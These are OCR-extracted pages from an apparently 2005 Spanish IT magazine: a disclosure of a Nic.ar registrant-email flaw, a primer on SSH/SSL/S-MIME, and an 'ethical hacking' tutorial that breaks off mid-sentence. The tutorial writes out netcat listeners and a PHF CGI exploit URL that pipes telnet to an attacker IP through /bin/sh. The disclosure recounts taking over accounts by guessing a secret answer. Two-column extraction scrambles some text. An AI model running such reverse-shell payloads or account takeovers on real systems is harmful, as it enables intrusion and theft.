e implementó el ya casi obsoleto sistema de *Importante: Cabe destacar que esta falla está tendrían y tendrán de seguir asi, en las enti-
registro - al no tener en cuenta la primera ley arreglada al dia de la fecha, dado a que interac- dades y personas... y porque no en muchos
del desarrollador Web en cuanto seguridad: túe con su personal administrativo para que otros usuarios de internet.Veamos el porque.
"Jamás confíes en que, la totalidad de los usua- ello ocurriera.
rios o visitantes van a introducir los datos correc- From: Nic-Argentina <info@nic.ar> DelitosInformaticos
tos o esperados dentro de un formulario online" Reply-To: info@nic.ar
To: Carlos Tori La información sensible - en este caso el mail
Somosesclavosdelasleyes Date: Apr 5, 2005 11:31 AM personal, institucional o corporativo del regis-
parapoderserlibres.Cicerón. Subject: Re: Para Horacio, Pablo o Isabel... trante de un dominio - enviado al que lo so-
licite sin más, o bien en manos de un potencial
Acerca de Habeas Data: "El régimen de protec- MUCHAS GRACIAS por tu cooperación! Horacio. delincuente con algunos conocimientos de se-

|64 - NEX / Revista de Networking y Programación


guridad informatica e internet, podría generar
algunos de los acontecimientos que enumero a
continuacion:
- Venta de los datos para armar databases uti-
lizadas en Spam de empresas de Hosting u otras
- Y el más peligroso, al conseguir la clave de la
casilla - que es solo cuestion de tiempo, más sin
saber ellos de que su casilla teoricamente
secreta de registro estaba siendo monitoreada
- Cambiar los DNS de los dominios hacia a un
servidor X que permitiría:
- Fake Site o sitio falso para robo de informa-
ción: claves, correos, mensajes para celulares,
datos varios sensibles.
- Cambio de DNS a dominios de ISP impor-
tantes, con la consecuencia que tendría en los
sus miles de usuarios, correo, webs personales,
de las redes corporativas de una empresa sin reporte de una falla de un colega hacia la
robo de cuentas Pop/FTP en masa, mails...
ser descubiertos. misma institución.
- Ingenieria social de maxima credibilidad
Sacando información para utilizar en un futuro, ¿Y luego? sin hurgar en su contenido (es tan
(dado a usar correos de dominios dominados)
alojar datos sensibles o databases ajenas, ilegal como hacerlo con el correo ordinario)
o robo de identidad para cometer fraudes y
usando los recursos de sistemas para ir a cerré ambas seciones y seguidamente le escribí
estafas a granel de: homebanking, compra/
meterse en otros, leyendo los mails que es- a los respectivos responsables a su casilla per-
ventas online, extorsión, extracciones de
criben sus empleados y ejecutivos, la gama es sonal, para que cambiaran sus claves y pregun-
dinero, deformación de sitios, apropiación de
amplia - que va desde el espionaje industrial al ta secreta, comenté de que estaba redactando
dominios con fines de venta, invasión de la
warez - acumulación de software ilegal en una nota acerca de la falla de Nic.ar que daba
privacidad, solicitud de otra información sen-
servers ajenos para su intercambio - y más aún sus mails de registro al público y que tomen
sible a otras entidades o allegados, solicitud
pasan desapercibidos cuando la empresa cree mejores medidas dado al peligro que signifi-
de dominios registrados, bajas de dominios
estar bien segura. carian en manos de un chico o delincuente
con posterior registro y otros tramites... la lista
Veamos un simple, figurativo y rapido ejemplo: cualquiera... además como siempre nunca se
es extensa y en este campo no hay que dar
Según la informacion que brindó en su sabe si paso antes alguien con otros fines.
tantas ideas.
momento Nic.ar, todos los dominios del grupo Ahora imaginen, ¿tienen idea del problema que
Telecom (aproximadamente unos 170) están hubiera sido redireccionar todos los dominos
El"ciberterrorismo"
registrados a través de tan solo 2 cuentas de del grupo Telecom? quedarse con el catch all
aquíesposible?
mails... una de Hotmail y otra institucional de total de los mails @arnet.com.ar, los corpora-
Arnet perteneciente a un empleado. (Aquí es tivos/ejecutivos @ta.telecom.com.ar,los telefon-
Es una palabra fuerte, de pelicula, pero dándole
cuando la curiosidad deviene en un desafio in- icos @telecompersonal.com.ar, los contenidos
como equivalencia "importantes incidentes in-
telectual para la comprobación de seguridad o de los mensajes de a celulares, cuentas pop/FTP
formáticos y delictivos", claro que sí. Más aun
de una simple idea.) y toda la informacion que alli llegaba?
dada la situación actual de los ISP y networks
- La cuenta de Hotmail, comprobada como Informacion de redes internas,intranets,routers,
del pais, que son un caldo de cultivo para estos
debil en seguridad por la respuesta secreta servers, passwords e información relevante o
personajes que se dedican al ciberdelito, ya sea
lograda en 20 segundos al descubrir que tenía clasificada, personal y privada, logins de todo
o no, un simple adolescente intruso con
como respuesta secreta: el grito de festejo de tipo... un oceano de información, aunque sea
conocimientos de compilación y ejecución
Arquimedes en su bañera. Esa misma, una por unas horas o una noche de fin de semana.
local de un exploit para kernel en linux.
palabra y un signo de admiracion. Altisimo impacto/costo.
La mayoria de la gente que administra sis-
- La cuenta de Arnet, una cuenta olvidada, con ***Nunca dominios de tales caracteristicas
temas, gente con conocimientos de informati-
una clave random de menos de 9 letras… pueden estar ligado a unas simples ( y como si
ca en Gral o analistas de sistemas, creen que un
obtenida hace algun tiempo… en el que se fuera poco vulnerables ) casillas de correo.***
hackeo es cuando deforman un sitio o cuando
podían ver claves online en texto plano en el Imaginense ahora las garantias que tenían y
cambian la clave de una cuenta de correo
Hotmail. Nada más erroneo que eso.
Las intrusiones sutiles o robos de información
sensible quizá no se detecten nunca, dado a la
capacidad de pasar desapercibido o habilidad
de manejar rastros (y vanidad -de no andar ha-
blando por ahí o mostrando datos robados-)
del que lo comete.
El 95% de los (solo)intentos son chicos adoles-
centes jugando con scanners, pero hay un
ínfimo porcentaje de situaciones en las que
pueden pasar meses y porque no, años, dentro

Revista de Networking y Programación / NEX - 65|


tienen actualmente los activos vitales - la infor- de dolares, esto es una realidad vital, tanto capa de aplicaciones, tecnologia y sistemas op-
mación confidencial - de muchas empresas mi- como mantener la confidencialidad de todos erativos. De perfil CISSP.
nusculas online en comparación a ellos ( ni nuestros datos.
hablar del usuario normal de internet ) que * Implementar panel de control de usuario con
estan en riesgo y no tienen la mas mínima idea tramites automáticos instantaneos - sin hacer Notadelredactor:
de la seguridad informatica. pasear tanta info por la net via correos reenvia-
dos ni trámites engorrosos en tiempo y forma - Es importante que en estos tiempos se
Sugerenciasausuarios, * Login via user/pass con datos de registro adopten medidas serias en cuanto a seguridad
empresariosyresponsables comprobados por personal via telefono y informatica y se trate de modo serio la infor-
desistemasenISP padron nacional, via SSL (mediante en- mación sensible de las personas y empresas,
criptación 128 bits, ver Certisur S.A en Google). actuando en prevención, capacitando en stan-
- Adoptar una decente administración de las * Sectorizar usuarios de registro en usuarios dares y normas, metodologias, incentivando a
terminales y servidores que usan a diario comunes,pymes y empresas de hostings con cobro los administradores y responsables, aplicando
- Adoptar un plan de seguridad y auditorias serias de dominio anual y por cantidades de dominios. soluciones como resultado de profundos y ex-
- Un plan de claves alfanumericas de mas de 8 * Estipular limites de registro, no es posible que haustivos análisis de riesgos.
digitos que no tengan nada que ver con parientes, alguien por ser gratis registre 5600 dominios y Es un momento crucial en la evolución IT
gustos,nombres o palabras de diccionario. los quiera vender a alguien que verdadera- Argentina, dado a los excelentes recursos
- Adoptar respuestas incoherentes en respues- mente lo necesita humanos que disponemos para llevarlo a cabo y
tas secretas de casillas de correo * Dar tiempos - caducidad - y permisos a nivel a la actitud generacional que se esta gestando
- Adoptar la criptografía como resguardo de la sesión, que una ip o user no pueda hacer 5 reg- desde hace unos 10 años a la fecha, más tenien-
confidencialidad en información importante istros por dia ( a menos de que sea una do en cuenta el auge de Internet por estos dias.
- Adoptar los backups e imágenes de sistema puros empresa de hosting ) La falla de confidencialidad en la tramitación y
- Contratar administradores de sistemas real- * Que solo se muestre en la consulta de respon- casillas de correo débiles, fueron reportadas a H
mente capacitados,esto va más alla de los titulos sable de dominio: Nombre, apellido y telefono de Nic.ar, a GCG de Telecom y a GM de TI,
- Certificaciones que posean, no usen agencias de la persona dueña de un registro, "solo" a ninguna información sensible se obtuvo de
de recursos humanos para contratar admin- traves del panel de control en modo privado y modo fraudulento ni se publicó en este docu-
istradores o personal de sistemas, consulten a no al publico. mento en perjuicio de empresa, persona, o
gurues que les recomienden personal calificado * Dar de baja automaticamente a dominios sin Habeas Data,al contrario se la previno de graves
- En cuanto a registros Nic.ar, utilizar correos uso en determinado tiempo o a aquellos denun- y potenciales incidentes informáticos, dando
seguros por ahora ya que son vitales para los ciados con material ofensivo, racista, o prohibido. lugar a este material pedagógico -preventivo
tramites actualmente o bien, dar de baja en su *Clasificar dominios importantes para "lockear" para presentar en un principio a la gente que
dominio al usuario que usaron para tal fin. (bloquear) trámites via web y fax, por ejemplo, asistió al meeting sobre Delitos Informaticos de
- Concientizarse en que la información impor- para hacer trámites de cambios en dominios I-Sec, y ahora a los lectores de NEX.
tante es un activo "vital" de la empresa como "arnet.com.ar", que se presente el jefe de
sistemas con DNI en mano y un administrador Mis dos centavos a la comunidad, gracias por
Algunassugerenciasalpersonal capacitado lo atienda personalizadamente. su atencion. Atte.
responsabledeCancilleria/Nic.ar * Establecer la sponsorizacion (oficial) del reg-
istro para disponer de un pequeño call center
Como medida esencial, actualizar el sistema de de atención al publico las 24Hs y personal para
registro y tramitación por completo. comprobación de identidades reales Carlos Tori
Esto no es una fantasia como el bug del año * Contratar a personal profesional especializa- www.nnlnews.com
2000 al que se destinaron inutilmente millones do en seguridad informatica, no solo a nivel PGP ID 0x7F81D818
Comunicaciones
SEGURAS
|68 - NEX / Revista de Networking y Programación Foto: © 2005 Hemera Technologies Inc.
ETHICAL HACKING - FUNDAMENTOS

Cuando se diseñó Internet, sus creadores no ad- datos personales en máquinas accesibles por
virtieron la necesidad de transmisiones seguras red, información bibliográfica, e incluso actual-
con sus protocolos. De hecho ni TCP/IP ni HTTP mente muy utilizado para revisar y/o retocar las
proporcionan un método para codificar y prote- configuraciones de equipos como routers, etc.
ger las transmisiones individuales. Los dise- Su mayor problema es de seguridad, ya que
ñadores originales de HTTP crearon el protoco- todos los nombres de usuario y contraseñas
lo como método para comunicar información necesarias para entrar en las máquinas viaja-
multimedia como gráficos, video, sonido, ban por la red sin cifrar (es decir en texto claro).
etcétera. Los diseñadores de la Web no se Esto permite que cualquiera que espíe el
dieron cuenta, ni tampoco tenían razón alguna tráfico de la red pueda obtener los nombres de
para esperarlo, de que HTTP se convertiría en el usuario y contraseñas, y así acceder a todas
núcleo central de una increíble cantidad de esas máquinas. Dejó de usarse casi totalmente
aplicaciones comerciales. Mientras la gente hace unos años, cuando apareció y se popula-
comenzaba a utilizar la Web para el co-mercio, rizó el SSH, que puede describirse como una
las empresas y los usuarios reconocieron la versión cifrada de Telnet. Como medida extra
necesidad de transacciones seguras de un de seguridad, deberíamos deshabilitar el
extremo a otro, en lugar de las transacciones in- puerto correspondiente si es que no hacemos
seguras saltando de un lado a otro como es la uso de dicho protocolo: su puerto es el 23.
comunicación habitual de la Web.
RemoteLogin
SERVICIOS DE COMUNICACIONES
INSEGUROS Al igual que la utilidad TCP/IP telnet, en sis-
temas operativos UNIX se utiliza el comando
Telnet rlogin (remote login - login remoto) para es-
tablecer una sesión de login desde otra
Telnet es el nombre de un protocolo (y del pro- estación de trabajo UNIX remota. Telnet
grama informático que implementa el cliente) siempre pedirá un nombre de usuario y con-
que permite acceder a otra máquina mediante traseña. Aunque rlogin puede configurarse de
una red TCP/IP, para manejarla como si estu- modo tal que no se requiera contraseña como
viéramos sentados frente a ella. Para que la una conveniencia para los usuarios, el nombre
conexión funcione, como en todos los servicios de usuario y contraseña son también transmiti-
de Internet, la máquina a la que se accedía dos sin encriptación.
debe tener un programa especial que reciba y Hacer login remotamente a una estación de
gestione las conexiones. trabajo es útil bajo las siguientes circunstancias:
Sólo sirve para acceder en modo terminal, es - Para acceder a información en otra estación de
decir, sin gráficos, pero fue una herramienta trabajo que no esté disponible de otro modo.
muy útil para reparar fallos a distancia, sin - Para acceder a la estación de trabajo de un
necesidad de estar físicamente en el mismo usuario remotamente para leer el correo.
sitio que la máquina que los tenía. También se - Para "matar" un proceso que ha ocasionado que
usaba para consultar datos a distancia, como la estación de trabajo del usuario se cuelgue.

Cuandotransmitimosinformaciónporunared,
noestamosexentosdeserespiados.Seapor
diversiónoconfinesespecíficosnospueden
estarvigilandomientrashacemostransacciones
víaInternet.Sepacómofuncionanlosprotocolos
deseguridadmásutilizados. Por Leonel F. Becchio
IPsec y VPN deberían estar contenidas en este
artículo. Pero, ya han sido estudiados en detalle
en "NEX IT Specialist # 14, Marzo 2005.
Referimos al lector a las páginas 52 a 59 para
VPN y 45 a 50 para IPsec.

Revista de Networking y Programación / NEX - 69|


Servicios de comunicaciones lizar cualquier transferencia de información. La Transmisiones seguras
seguros técnica que se utiliza es la de claves asimétric- por la Web
as, es decir un modelo de claves pública y
SSH privada basado en el algoritmo RSA. Esto es IntroducciónalprotocoloS-HTTP
una clave pública conocida por todos para en-
Desarrollado por la firma SSH Communications criptar el mensaje a enviar y una clave privada El Protocolo Seguro de Transferencia de
Security Ltd., SSH (Secure SHell o shell seguro) -conocida sólo por el destinatario- para poder Hipertexto (S-HTTP) es una versión modificada
es un servicio que permite conectarse a un desencriptarlo. del Protocolo de Transferencia de Hipertexto
equipo remoto con el fin de ejecutar coman- Una vez realizado en proceso de intercambio de HTTP que incluye características de seguridad.
dos en el mismo. Surgió como un reemplazo claves, se comienza a transmitir la información Su diseño permite comunicaciones seguras a
de servicios inseguros como telnet, rlogin, en forma segura.Obviamente,todo anexo de se- través de la Web que incluyen el envío de infor-
rcp,rsh y rdist. guridad que le infiere el protocolo, resulta en mación personal a largas distancias.
Este servicio, que realiza las conexiones sobre una mayor carga de tráfico de red. Los diferentes métodos utilizados por el pro-
el puerto 22, se ocupa de brindar confidencia- Una de las cosas interesantes es que SSH es in- tocolo para garantizar la seguridad del
lidad e integridad de la información que se dependiente de la plataforma, existiendo mensaje incluyen un método de firma, uno de
transmite puesto que inicia una sesión encrip- clientes desarrollados para Unix,Windows, OS/2 codificación, y comprobaciones del remitente
tada entre el cliente y el servidor antes de que y Macintosh,hasta existen versiones para PDA´s. y la autenticidad del mensaje.
se transfiera el nombre de usuario y la con- Existen varios clientes SSH, pero uno de los más Un mensaje S-HTTP combina el cuerpo codifi-
traseña. La idea es proveer una fuerte instancia conocidos es OpenSSH que se puede descargar cado del mensaje y la cabecera, que puede
de autenticación sobre canales inseguros. De de http://www.openssh.com. Es un cliente gra- incluir, la información sobre cómo puede de-
esta manera SSH protege a una red de ataques tuito y de código abierto que permite gestionar codificar el destinatario el cuerpo del
tales como sniffing, IP spoofing, cracking de en- los servicios SSH versión 1 y 2. SSH2 provee un mensaje y cómo debería procesarlo una vez
criptación, man-in-the-middle, etc.Un atacante más alto nivel de encriptación y autenticación descifrado el texto.
sólo podría forzar a que se desconecte la que SSH1 remendando algunas insuficiencias Para crear un mensaje S-HTTP, el servidor
conexión SSH, pero no podría reenviar tráfico o de éste último. integra las preferencias de seguridad del servi-
secuestrar la conexión misma una vez que Luego de establecer la conexión TCP, me- dor con las del cliente. Por ejemplo, si el servi-
existe encriptación. diante un saludo de tres vías, el cliente y el dor está configurado para utilizar el Estándar 7
Para poder encriptar la información que trans- servidor intercambian sus versiones de SSH. de Codificación mediante Clave Pública (PKCS-
mite, SSH requiere el uso de claves que sean Posteriormente intercambian las claves de en- 7) y la lista de codificación del cliente incluye
conocidas por ambos extremos. Estas claves criptación para luego poder transmitir la in- este protocolo, el servidor lo utilizará para co-
deben ser transmitidas por la red antes de rea- formación en forma segura. Ver Figura 1. dificar el mensaje. Al existir coincidencia en
Fig. 1 - Conexión SSH

|70 - NEX / Revista de Networking y Programación


alguno de los métodos, el servidor lo utiliza primer método utiliza un intercambio manual mensaje, la otra parte puede firmar digital-
para codificar el mensaje en texto plano y con- de claves, generalmente usado en intranets o mente incorporando dicho hash para que la
vertirlo en un mensaje S-HTTP. algunas redes bancarias que acuerdan exter- parte contraria pueda evaluar su integridad y
Para recuperar el mensaje, el cliente realiza el namente con el cliente cuál será la clave. El saber si alguien o algo ha modificado el docu-
proceso contrario, es decir, evalúa que la segundo método el servidor codifica su propia mento desde su envío.Ver Figura 2.
transmisión coincida con sus propias prefe- clave privada con la clave pública del cliente y
rencias criptográficas. Si no es así, intentará se la envía a éste. Para esto, el cliente le tuvo
decodificarlo utilizando las opciones crip- que haber enviado (en segundo plano) su
tográficas del servidor (inicialmente el servi- propia clave pública y el sistema criptográfico
dor y el cliente mantienen una conversación que empleó, para que el servidor lo sepa y lo
donde, por acuerdo el servidor afirma las op- utilice. Una vez recibida la clave del cliente, el
eraciones criptográficas que realizará en el servidor genera una clave de sesión (su clave
mensaje). Una vez que encuentra el estándar privada encriptada con la pública del cliente) y
de codificación, decodifica el mensaje medi- se la envía a éste para que le pueda enviar
ante alguna combinación de claves entre re- mensajes seguros.
mitente y destinatario. Cuando se haya deco-
dificado el mensaje se muestra en el explo- Integridaddelmensaje
rador Web el código HTTP. yautenticidaddelremitente

Codificacióndelmensaje Además de la codificación del mensaje, ambas


partes pueden verificar la integridad del
En sistema de criptográfico que emplea S- mensaje y la autenticidad del remitente calcu-
HTTP es de clave simétrica, es decir, el servidor lando un código para el mensaje.S-HTTP calcula
y el cliente son los únicos que conocen dichas un código para el mensaje como un "valor hash
claves y las emplean para codificar y decodi- relacionado con la clave de sesión" con el cual se
ficar los mensajes que envían. En este sistema corrobora en ambas partes que coincida el hash
los usuarios deben encontrar un método para enviado con uno generado localmente, a partir
intercambiar las claves. En S-HTTP define dos de la clave de sesión que ambos conocen, para
mecanismos: uno que intercambia claves verificar la integridad del mensaje.Dicho hash se
públicas acordadas en forma externa y otro denomina Código de Autenticación de Mensaje.
que se denomina intercambio "en banda". El Si una de las partes solicita la verificación del

Fig. 2 - S-HTTP

Revista de Networking y Programación / NEX - 71|


TransmisiónseguraconSSL mensaje Client.Hello que trabaja de forma
similar a una petición HTTP. Además de infor-
A diferencia del protocolo S-HTTP, que fue dise- mación del explorador, éste le envía su clave
ñado para transmitir mensajes individuales en pública que generó en el momento de su insta-
forma segura, el protocolo SSL fue creado con lación en el sistema.
el fin de crear conexiones seguras de extremo a Una vez que el servidor recibe el mensaje,
extremo entre el cliente y el servidor sobre las evalúa la información del mismo. Si el explo-
cuales poder enviar cualquier cantidad de rador y el servidor coinciden en un tipo de codi-
datos en forma segura. ficación admitida por ambos, el servidor le res-
SSL, abreviatura de Secure Socket Layer (Capa ponde con un mensaje Server.Hello. Dentro de
Socket Segura) es un protocolo desarrollado la respuesta, viaja la clave pública del servidor.
por Netscape Communications Corp. para Cuando el cliente recibe la respuesta,envía otra
proveer seguridad y privacidad sobre Internet. petición al servidor. Ahora el cliente codifica
Se trata de un protocolo abierto no propietario, esta segunda petición con su clave pública,
lo que significa que Netscape ha puesto a dis- ahora que el cliente ya la conoce. La segunda
posición de las empresas para ser utilizado en petición del cliente le indica al servidor que
aplicaciones de Internet. Se diseño con el fin de envíe la clave de sesión que utilizarán para la
proveerle seguridad a los protocolos de la capa comunicación. A su vez, el servidor devuelve la
de aplicación como HTTP,Telnet, FTP, por lo que clave de sesión, que codifica con la clave
se sitúa debajo de dicha capa y encima de la pública del cliente.
capa de transporte TCP. El último estándar SSL Una vez que el cliente recibió la clave de sesión,
3.0 proporciona codificación de datos, autenti- utilizará esta para codificar toda información
cación de servidores, integridad de los men- que se transmita.Ver Figura 4.
sajes y autenticación opcional del cliente para Las transmisiones que utilizan SSL permanecen
una conexión TCP/IP. activas hasta que el explorador o el servidor
Al proporcionar un método para que los servi- cierran la conexión (en general cuando el ex-
dores y clientes codifiquen las transmisiones en plorador solicita una URL diferente). Fig. 3
la Web, requiere que en la conexión participen
servidores y exploradores preparados para SSL.
Los exploradores Netscape Navigator e Internet
Explorer incorporan dicha capacidad. En Internet
Explorer podemos comprobar su existencia si
nos dirigimos a Herramientas | Opciones de
Internet | Opciones Avanzadas.Ver Figura 3.
Las comunicaciones seguras no eliminan por
completo las preocupaciones de un usuario en
Internet. Aunque SSL asegura la comunicación
en Internet, esta seguridad por sí sola no
protege al usuario ante la gente descuidada o
corrupta con los que podría tener transac-
ciones comerciales.
La autenticación de servidores SSL utiliza crip-
tografía RSA de clave pública junto a una
Autoridad Certificante como Thawte o VeriSign.
Siempre que se conecte a un servidor, se podrá
ver su certificado para comprobar su identidad.

CómoaseguraSSLlas
conexionesdeextremoaextremo

Cuando un explorador y un servidor establecen


una conexión segura, es servidor envía al explo-
rador una clave de sesión que ambos utilizan
para codificar las comunicaciones en la conexión.
Sin embargo, el servidor y el explorador primero
deben intercambiar la clave de la sesión. El
sistema que utilizan es de clave pública.
Cuando el explorador se intenta conectar con
un servidor seguro, envía al servidor un

|72 - NEX / Revista de Networking y Programación


Fig. 4

Para saber si un documento proviene de un


sitio seguro, debemos mirar el campo donde
escribimos las URL´s y observar una "s" tras el
protocolo http , es decir que el sitio en
cuestión comenzará con https:// . Además, en
el momento de entrar en un sitio seguro, en
Internet Explorer se podrá visualizar un can-
dadito amarillo cerrado en la parte inferior
izquierda del navegador.
En 1996, Netscape Communications Corp.
mandó el SSL a la IETF, organismo que se encar-
garía de su estandarización. El resultado fue
TLS (Transport Layer Security). Los cambios
hechos a SSL fueron pequeños pero, sin
embargo resultaron suficientes para que SSL
versión 3 y TLS no puedan interoperar. Lo que
se buscó es obtener un protocolo con claves
más fuertes que sea más difícil de crip-
toanalizar. La versión TLS 1.0 se la conoce como
SSL 3.1. Si bien las primeras implementaciones
aparecieron en 1999, aún no queda claro si TLS
reemplazará a SSL en la práctica, aunque es li-
geramente más fuerte.

Correo Seguro
MIME&S/MIME

MIME es la abreviatura de Multipurpose que éste carece. S/MIME (Secure / 2. Firma digital DSA. La clave de verificación de
Internet Mail Extensions, cuya traducción Multipurpose Internet Mail Extensions) es un firma es de 1024 bits. Esto garantiza la integri-
podría ser Extensiones Multipropósito de protocolo que agrega firmas digitales y en- dad de un mensaje y la autenticidad de la di-
Correo en Internet. Se trata de una especifi- criptación a MIME. El cuerpo MIME transporta rección de respuesta.
cación para darle formato a mensajes no ASCII un mensaje codificado en PKCS-7. El estándar 3. SSL. El mensaje viaja a lo largo de un canal
para poder ser enviados a través de Internet.. actual es S/MIME versión 3 . seguro donde es adicionalmente encriptado.
Los mensajes de correo poseen dos partes: la Existen varias empresas que comercializan La longitud de la clave de encriptación es de
cabecera del mensaje, que contiene unos casillas de correo seguras. Por ejemplo la firma hasta 1024 bits.
campos estructurados conteniendo informa- S-Mail brinda casillas cuya protección se basa Para mayor información visite www.s-mail.com
ción esencial para la transmisión del mensaje, y en tres niveles principales: Otra alternativa es la que ofrecen empresas
el cuerpo del mismo totalmente desestructura- 1. PGP. El mensaje es encriptado con una clave como Digi-Sign que comercializa números de i-
do a menos que se encuentre en formato de sesión de 128 bits generada aleatoriamente dentificación Digi-IDs que son identificadores
MIME. Muchos clientes soportan ahora MIME la cual se encriptada con la clave de 2048 bits personales únicos que permiten a los individu-
ya que les permite enviar y recibir gráficos, del destinatario. os estar irrefutablemente ligados a sus ac-
audio, y video a través del sistema de correo en
Internet. Adicionalmente MIME soporta el
envío de mensajes en otros conjuntos de carac-
teres además de ASCII. Asimismo los explo-
radores también soportan varios tipos MIME, lo
que les permite mostrar archivos que no estén
en formato HTML.
Una nueva versión, llamada S/MIME, nace
para brindarle a MIME el servicio de seguridad

Revista de Networking y Programación / NEX - 70|


SEGURAS

Dentro de las tecnologías que uti-


lizamos para proteger las comunica-
cionesinalámbricassehadesarrollado
el protocolo WEP para el estándar
IEEE802.11conelobjetodebrindarun
niveldeseguridadequivalentealquese
COMUNICACIONES INALAMBRICAS

obtieneenunaredcableada.Debidoa
vulnerabilidadesendichoprotocolo,se
haimplementadoelprotocoloWPAque
trabaja con claves que caducan luego
de un tiempo de estar activadas. Lo
bueno de esta implementación es que
no necesita de una actualización de
hardwaresinodesoftware.Másrecien-
tementeexisteWPA2quemejorayex-
tiendelascualidadesdeWPA.

A pesar de que ha sido objeto de estudio dentro


de NEX IT Specialist # 13 bajo el título "Seguridad
Wireless", en breve le dedicaremos un artículo
completo al desarrollo de dicho tema.

Fig. 5

Fig. 6

ciones, transacciones y comunicaciones. Actúan como un equiva-


lente de los que es la licencia de conductor. También pueden ser
usados para firmar archivos digitalmente.
A cada usuario que envía un e-mail fuera de la organización, se le
asigna un número de identificación Digi-ID. Para conseguir uno, el
usuario debe probar su identidad respondiendo una serie de pre-
guntas que sólo él podría conocer. Esto lazo entre el Digi-ID y la
persona específica se conoce como proceso de validación. Una vez
que el usuario fue validado, teniendo asignado su ID, el usuario
pasa a firmar y/o encriptar automáticamente cada e-mail saliente.
Este servicio funciona en Microsoft Outlook, Outlook Express,
Lotus Notes, etc.).
Veamos cómo configurar Outlook Express con IDs. Para eso abrimos
Outlook Express y vamos al menú Herramientas | Opciones |
Seguridad. Ver Figura 5.
Allí tildaremos la opción para firmar digitalmente todos los men-
sajes salientes y cifrar el contenido y datos adjuntos de todos los
mensajes salientes. En la opción Ids. digitales tenemos la posibili-
dad de importar un ID si es que tenemos uno. Si vamos a Opciones
avanzadas, podremos elegir, entre otras opciones, que nos avise si
estamos cifrando con una clave menor a tantos bits. Ver Figura 6.

|74 - NEX / Revista de Networking y Programación


ETHICAL HACKING Paso 7

HACKING

UNIX
Parte 2 de 2: Acceso Remoto: usando "reverse telnet"
(Parte 1 de este artículo en NEX IT Specialist # 14, pag 70, Marzo 2005).

Por Carlos Vaughn O´Connor

En la parte 1 sobre acceso remoto,detal- Normalmente el acceso como root se que como vimos en la parte 1 nos
lamos los pasos que sigue un hacker logra en varios pasos: permite inyectar comandos. Por
para comprometer un sistema Unix. 1.Mediante el exploit de una vulner- ejemplo, pedirle que nos abra una
En particular,cómo a través de una vul- abilidad realizamos un acceso via la consola de comandos (X-Windows).
nerabilidad es posible lograr el acceso red (acceso remoto) y logramos la ¿Pero que sucede si "xterm" está desha-
remoto a un sistema.Realizamos una e- posibilidad de ejecutar comandos en bilitada en la máquina víctima?.
jemplificación basada en la vulnerabili- el sistema remoto víctima.Muy prob- Otra opción es crear lo que se llama un
dad conocida como PHF de CGI y vimos ablemente, no tendremos privilegios "back channel": la comunicación se
como era posible librar comandos sobre de root. origina en la máquina víctima (en este
un servidor web víctima. Si "xterm" (el 2. Ya con acceso local (una shell a caso el web-server) y no en la máquina
cliente para obtener una X-Windows) nuestra disposición) escalaremos atacante. Veremos dos variante:
existía en la víctima, mostramos como privilegios hasta root (Paso 8, Ethical "reverse telnet" y uso de netcat en
el servidor web nos podía proveer de Hacking: Hacking Unix, NEX IT lugar de telnet.
una ventana para ejecutar comandos. Specialist #16,Mayo 2005).
En lo que sigue,y nuevamente usando 3. Con privilegios de root devastare- ReverseTelnet
el mismo exploit basado en la vulner- mos el sistema y la red completa. En la mayoría de los sistemas Unix exis-
abilidad PHF, veremos una segunda En este artículo detallaremos una tirá un cliente telnet. Suponemos en-
técnica (muy popular) llamada técnica muy popular (de lo que es el tonces que esto es así en nuestro web-
"reverse telnet" (telnet inverso).Netcat punto 1.más arriba) de acceso remoto server víctima. Ejecutaremos telnet en
(la llamada navaja suiza de la seguri- llamada "crear un back channel" y en nuestra máquina víctima pero nece-
dad informática), será usada como particular "reverse telnet". sitaremos de netcat (nc) de modo de
parte de esta técnica. habilitar a los "nc listeners" (escuchado-
La vulnerabilidad PHF es muy antigua Resumendelproblema ras nc) en nuestro sistema de modo de
en el mundo Unix y es poco probable aceptar la conexión "reverse telnet".
que aparezca en servidores en produc- En una red como la de la figura,trataré
ción en estos días.La idea es aprender desde una máquina que accede a inter- ¿Quépasos
la metodología, y para esto PHF nos net,lograr comprometer el web-server debemosseguir?
sirve muy bien. del segmento DMZ. Como vemos
existe un firewall que supondremos 1. Ejecutaremos nc en nuestro
Introducción sólo permite acceder (entrada) a los sistema en dos ventanas separadas
puertos 80,25,20 y 21 (al web-server,el de modo de recibir las conexiones
El mayor logro buscado por un hacker al mail server y ftp server respectiva- "reverse telnet".
comprometer un sistema Unix, será mente) y salida por 80 y 443. #nc -l -n -v -p 80
acceder a un shell de comando como Partimos del supuesto que existe una listening on [any] 80
usuario "root".Root es el todopoderoso vulnerabilidad en el servidor web. Por #nc -l -n -v -p 25
de un Sistema Operativo (SO) Unix. ejemplo la famosa PHF (un script CGI) listening on [any] 25

|76 - NEX / Revista de Networking y Programación


2.asegurarnos que no tenemos otros servicios es-
cuchando en 80 y 25 (HTTP o SMTP)

3. Usando el exploit PHF de CGI sobre el web-


server, ejecutamos el siguiente comando sobre la
máquina víctima:

/bin/telnet IP_de_maquina_atacante 80
| /bin/sh | /bin/telnet
IP_de_maquina_atacante 25

Usando el exploit PHF estos comandos se ejecu-


tarían del modo siguiente:

/cgi-bin/phf?Qalias=x%0a/bin/
telnet%20IP_de_maquina_atacante
%2080%20|%20/bin/sh%20|%20/bin/telnet%2
0IP_de_maquina_atacante%2025
TELNET
¿Quéhaceestecomando?
Telnet es el nombre de un proto-
/bin/telnet IP_de_maquina_atacante 80 colo (y del programa informático
que implementa el cliente) que
Básicamente conecta (a la máquina víctima) vía el permite acceder mediante una red
a otra máquina, para manejarla
puerto 80 a los nc listeners en puerto 80,activados como si estuviéramos sentados
en nuestra máquina atacante LA VULNERABILIDAD delante de ella. Para que la conex-
Es aquí donde tipeamos nuestros comandos que DE PHF ión funcione, como en todos los
son pasados (piped) a /bin/sh (una Shell Bourne). servicios de internet, la máquina a
Los resultados de esos comandos son pasados PHF es un típico ejemplo de los lla- la que se accedía debe tener un
("piped") a bin/telnet IP_de_maquina_atacante mados "Ataques de Validación de programa especial que reciba y
25. El resultado es un "reverse telnet" que sucede Input" (Input Validation Attacks). gestione las conexiones.
Fue una tristemente famosa vulner-
en dos ventanas separadas.
abilidad reportada por J. Myers en Sólo sirve para acceder en modo
Aquí usamos los puertos 80 y 25 ya que estos son 1996. PHF era un Script de CGI, muy terminal, es decir, sin gráficos, pero
los que el firewall permite salir.Pero de ser permi- divulgado y que venía estándar en fue una herramienta muy útil para
tido por el firewall,cualquier puerto serviría. Apache y NCSA HTTPD. arreglar fallos a distancia, sin
El script básicamente aceptaba el necesidad de estar físicamente en
Unavariantea"reversetelnet" carácter (%2a) (nueva línea) y eje- el mismo sitio que la máquina que
